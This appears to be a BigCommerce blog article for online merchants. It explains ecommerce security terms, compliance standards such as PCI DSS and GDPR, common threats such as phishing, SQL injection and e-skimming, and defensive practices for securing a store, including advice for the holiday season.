Before the rise in popularity of online shopping, the greatest retail cyber threats were focused on brick-and-mortar stores — particularly, breaches of point-of-sale (POS) systems to pilfer shoppers’ credit card information.
This is exactly what happened to Target, which discovered in late 2013 that it had fallen victim to a breach that compromised more than 100 million credit and debit cards.
While attacks on major retailers, financial institutions, and large enterprises get a lot of attention, they’re not the only targets — and it’s not just brick-and-mortar POS’s being targeted. The payday for criminals stealing information from ecommerce sites is on the rise, putting even mid-sized online stores at risk.
What is ecommerce security?
The frequency and sophistication of cyber attacks has skyrocketed in recent years. Ecommerce security refers to the measures taken to protect your business and your customers against cyber threats.
Let’s look at some terminology and common acronyms you should know:
Payment Card Industry Data Security Standard (PCI DSS)
PCI DSS (often referred to as just “PCI”) is an industry standard that ensures credit card information collected online is being transmitted and stored in a secure manner.
International organisation for Standardisation (ISO)
ISO is an international standard-setting body that creates requirements that guide businesses in making sure their products and processes are fit for purpose. One of their standards, ISO/IEC 27001:2013, covers data security. Achieving this certification means a business has high quality management systems, data security, risk-aversion strategies, and standardised business practices.
Personal data or personal information refers to any data that can be linked back to a specific individual — most simply, this includes names, email addresses, and phone numbers. But it can get a little bit more complex as well. Any data set — even scrubbed of specific names or numbers — that can identify a particular person is considered personal data. Protecting personal data is particularly important when it comes to data privacy regulations like GDPR (more on that later).
Transport Layer Security (TLS), Secure Sockets Layer (SSL), and HTTPS authentication
Utilising SSL helps to authenticate and encrypt links between networked computers. Once you have an SSL certificate for your ecommerce site, you can move from HTTP to HTTPS, which serves as a trust signal to customers that your site is secure.
Multi-factor authentication (MFA), 2-factor authentication (2FA), or 2-step verification (2SV)
MFA, 2FA, and 2SV are sometimes used interchangeably — and they are similar — but there are differences among them. In addition to entering a username and password, all three of these methods require at least one further method of identity verification of a user logging in to a site — like your ecommerce store.
Here’s a high-level explanation of the differences:
- 2SV may require the user to enter a one-time code, delivered via an email, text message, or phone call.
- 2FA goes a step further and may require the user to acknowledge their login attempt through another device, like opening a specific app on a mobile device while logging in from a laptop.
- MFA is similar to 2FA but can refer to the implementation of more than two factors of authentication.
Distributed Denial of Service (DDoS)
A DDoS attack refers to a disruption of server, service, or network traffic by overwhelming it with a flood of traffic. This resource on Cloudflare, which offers more detailed information on DDoS attacks, compares it to a traffic jam. Imagine trying to pull out into a major roadway (those are your customers and legitimate traffic) during rush hour — all those cars are the compromised traffic, blocking customers out of your store.
Malware and ransomware
Malware, or “malicious software,” is software that attackers install on your system. Ransomware is a type of malware that locks the victim out of their system, or prevents access to data, until a ransom is paid to the attacker. Here are a few symptoms you may experience if your system becomes infected:
- Links take you to the wrong page destination.
- New toolbars or buttons appear in your browser, or new icons show up on your desktop.
- You experience a near-constant barrage of ad pop-ups.
- Your system is slow or repeatedly crashes, or your browser freezes frequently and becomes unresponsive.
- Your emails keep bouncing.
Why cybersecurity is critical for your business
Ecommerce websites hold a lot of data about their customers — and that makes business owners a target. According to a 2018–19 Global Information Security Survey from EY, customer information is the number one most valuable data category for attackers. Coming in at number five is customer passwords.
Here are some of the reasons it’s so important to have a cyber-secure environment:
Compliance is the ground level of your commitment. Your ecommerce business is required to meet certain standards to be considered “in compliance,” and fines can be levied against you and/or your business if you do not. More on this below.
If breached, you’ll have a whole host of other problems to address that will impact your bottom line. You may have to pay for a forensic investigation, data recovery services, credit monitoring for impacted parties, and more. (Some businesses turn to cyber liability insurance to help mitigate this financial risk.)
Customers put a lot of trust in the merchants they shop with, providing personal data and sensitive payment information with every purchase. Earning customers’ trust is critical to a continued relationship, and earning it back once you’ve lost it is really, really hard — that’s why it can have a big impact on customer loyalty and retention. 64% of consumers say they are unlikely to do business again with a company from which their personal data was stolen.
What is compliance, and how is it different from security?
The concepts of compliance and cybersecurity are often used interchangeably — and in some ways, they are related. But there are some important differences.
Compliance refers to the ability to meet a specific set of standards set out by governments or private institutions, and there can be legal repercussions for not complying. But meeting those compliance standards does not necessarily mean your ecommerce site is fully secure. (Note that there are many compliance standards that your business may be required to meet. We are only discussing several of the major, cybersecurity-related regulations.)
Payment Card Industry Data Security Standard (PCI-DSS)
Any business that manages credit card transactions must comply with the PCI-DSS requirements around protection of cardholder data, no matter their revenue or credit card transaction volumes. These data security standards are defined by the PCI Security Standards Council (PCI SSC) and enforced by credit card companies.
General Data Protection Regulation (GDPR)
GDPR is a relatively recent law enacted in the European Union to ensure the protection of European Economic Area (EEA) citizens’ personal data and privacy. And it doesn’t just apply to businesses in the EU. If you sell products internationally to any of these citizens, you will need to comply with GDPR as you handle any of their data.
The biggest security threats to your ecommerce site
The types and methods of cyber attack are broad and varied, and it would be almost impossible to delve into them all in one article. But there are some that rise to the top as the most important to know about for strong ecommerce security.
Phishing is a type of social engineering, and refers to methods used by attackers to trick victims — typically via email, text, or phone — into providing private information like passwords, account numbers, social security numbers, and more.
Malware and ransomware
When your device or network becomes infected with malware or ransomware — a type of malware — you may be locked out of all your important data and systems. Downtime is expensive, but regular backups of your site data can help keep this from being a devastating blow to your business. And by not clicking on suspicious links or installing unknown software on a computer, you can be better protected against attacks.
You may be at risk if your ecommerce site insecurely stores data in a SQL database. If not properly validated, a malicious query injected into a packaged payload can give the attacker access to view and even manipulate any information in a database.
Cross-site scripting (XSS)
E-skimming refers to a method of stealing credit card information and personal data from payment card processing pages on ecommerce sites. Attackers gain access to your site either via a successful phishing attempt, brute force attack, XSS, or third-party compromise, then capture in real time the payment information your shoppers enter into the checkout page.
Best practices for ecommerce security
The compliance standards mentioned above aren’t going away. In fact, trends in privacy concerns indicate that we should expect more regulations in the future as citizens across the world become more savvy about data and personal privacy.
This Data Breach Investigations Report dives deeper into trends in retail cyber attacks. Payment information is shown to be the prominent target, and ecommerce attacks continue to rise as point-of-sale breaches and card skimmers are, overall, declining.
If a security breach of your ecommerce site leads to a loss of customer data, the associated fines — and hit to your brand reputation — could be devastating.
1. Implement strong, unique passwords — and help make sure your customers do, too
More than 80% of attacks are attributed to weak or stolen passwords. It’s worth the extra effort to make sure you, your employees, and your customers implement good practices for strong passwords:
- Strong passwords are at least eight characters, and contain upper and lowercase letters, numbers, and symbols.
- Passwords should never be shared — each user should have his or her own unique, private username and password for login.
- Never use the same password for other login credentials as you use for your ecommerce site.
- Consider using a password manager.
- Never publicly share sensitive information like your date of birth, social security number, or any other info you may use as answers to security questions.
“Do not use any form of the default admin name provided. Attackers write scripts that run day and night trying over and over to log in to the admin panel, if you’ve used anything similar to “admin”, they are more likely to crack it.” - Jason Simmons, CEO, Dead Soxy
Protect your devices
Whether you’ve got one computer in a home office or a headquarters with a full networked computer system, make sure your connected devices are cyber secure with anti-virus software, firewalls, or another appropriate method of protecting against threats.
Steel against social engineering attempts
One of the best ways to avoid malware infections is to avoid falling into the phishing traps. Never provide any level of personal information unless you have verified the identity of the recipient. Additionally, no legitimate organisation will ever ask you to share your password.
Never click links in suspicious emails, as they may take you to a webpage that is made to look like a familiar login page but serves instead to steal your information. And do not download any attachments that you were not already expecting.
There are a few ways to distinguish phishing attempts from legitimate emails; here’s what to look for:
- Obvious spelling and grammatical mistakes in the subject line or body of an email could indicate a suspicious sender.
- Look closely at the domain of the email sender. They are often made to look like a familiar domain but are off by just one letter (e.g., BigCommerce.com could become BgCommerce.com).
- The same goes for any URLs you might click. At first glance they may appear legitimate, but the spelling could be off by one letter in the hopes you don’t notice and click anyway to a dangerous domain.
- Suspicious emails may ask you to do something like transfer money or authorize a charge, and offer an excuse for why it must be done immediately.
Implement additional authentication factors
It may feel like a burden at times, but using 2-step verification, 2-factor authentication, or multi-factor authentication gives you further assurance that you and your authorised users are the only people logging into your store. Considering the potential consequences of a breach, it’s worth it.
Only store the customer data that you need
When it comes to storing data, the bottom line is to never hold on to more than you need to optimally conduct your business. But in deciding what exactly that means for you, there are a lot of factors to consider.
Particularly with the growing number of data privacy regulations, it’s important to carefully establish your own business’ philosophy to balance customer experience, business convenience, and security.
“Always keep your customers’ critical data separate from other information by segmenting your network. Deploy firewalls and conduct audits to ensure that all of your security measures are functioning the way they are supposed to.” — Shane Barker, ShaneBarker.com
Make sure your site is always up to date
Security is a continuous cat-and-mouse game. Attackers identify vulnerabilities; software engineers patch them. If you are using a SaaS ecommerce platform like BigCommerce, updates to your software are taken care of automatically. But with on-premises ecommerce solutions, your business is responsible for implementing any updates, bug fixes, or vulnerability patches to the software that powers your store.
“With our previous ecommerce platform, there were ongoing security updates that we had to manually install which would always “break” something else. We had to create a secondary sandbox site to test security updates prior to uploading to our live site. As you can imagine, this was not ideal.” — Billy Thompson, President, Thompson Tee
Switch to HTTPS
Secure HTTPS hosting, which requires an SSL certificate, will help secure your website. It’s also a boon for your marketing department, because Google penalises websites with HTTP in organic search rankings. HTTPS sends a positive trust signal to your shoppers — particularly the digitally savvy.
Back up your data
If you are breached and lose access to your data, you are going to want a backup to help you get your business back up and running as quickly as possible.
Regularly review all plugins and third-party integrations
Take an inventory of all the third-party solutions you’re running within your store. Make sure that you know what they are and assess your continued level of trust in that third party. If you’re no longer using them, remove that integration from your store. The idea is to allow the fewest number of parties to have access to your customers’ data, while still driving your business forward.
Double down on security this holiday season
The holiday season is, unfortunately, a time you can expect higher volumes of attempted fraud and cyber crime. Everyone is really busy, and there are huge spikes in traffic on ecommerce sites, making anomalous behaviour more difficult to protect. Attackers know this — and see it as an opportunity.
Here are some things you can do to ensure website security through the holidays:
Do a pre-holiday security check
“The holiday season is the time when a good majority of ecommerce cyber-attacks take place, taking advantage of the holiday rush. Retailers should prepare for this in advance and conduct a thorough security check before the holiday season starts. This should include checking for malware in point-of-sale systems and improving the security of web servers.” — Shane Barker, ShaneBarker.com
Your holiday security audit should also include an examination of who has access to what:
“Make sure to review admin-level accounts and privileges for your store, marketing software, and other tools. Disable or delete unused accounts. Update permissions to reflect the actual workflows for particular users.” — Jordan Brannon, President, Coalition Technologies
Dial up your fraud protection
A steep spike in shoppers is often accompanied by an increase in fraudulent activity.
“Another form of cyber risk and one of the biggest risks to ecommerce brands today is the chargeback scam. Attackers acquire credit card information along with credentials and go on a spending spree. The retailer gets an order and ships it not thinking twice about it. Only to receive a chargeback at some point in the future because the charge was marked as fraud. The retailer can’t argue and is forced to refund the order and the goods are long gone. This is even compounded more with loyalty programs and gift cards.
This type of cyber fraud is very hard to prevent. After losing 1000s in merchandise we started using the Eye4fraud.com app for BigCommerce. The app tells us in real time if each order should be shipped or not and offers a guarantee for any chargeback.” — Jason Simmons, CEO, Dead Soxy
Prepare your customer service team
Make sure you and your team are prepared for common threats — including having a clear process for verifying the identity of customers who request any changes to their orders or accounts.
Have a security update plan
It’s good advice to get your store pretty much locked down for the holidays and not make too many changes to it, just to avoid the extra risk that that can entail. But that general guideline does not apply when it comes to security, and patching your site for any vulnerabilities. This is mostly applicable if you have an on-premise ecommerce solution. You need to have a tried and true plan for site updates if they become necessary to ensure the security of your business and your shoppers.
Cybersecurity is a 24/7/365 endeavor that encompasses people, processes, and technologies.
By following the tips in this post and staying aware of what’s happening in the cybersecurity landscape, you can provide your customers with a shopping experience they can trust.
This material does not constitute legal, tax, professional or financial advice and BigCommerce disclaims any liability with respect to this material. Please consult your attorney or professional advisor on specific legal, professional or financial matters.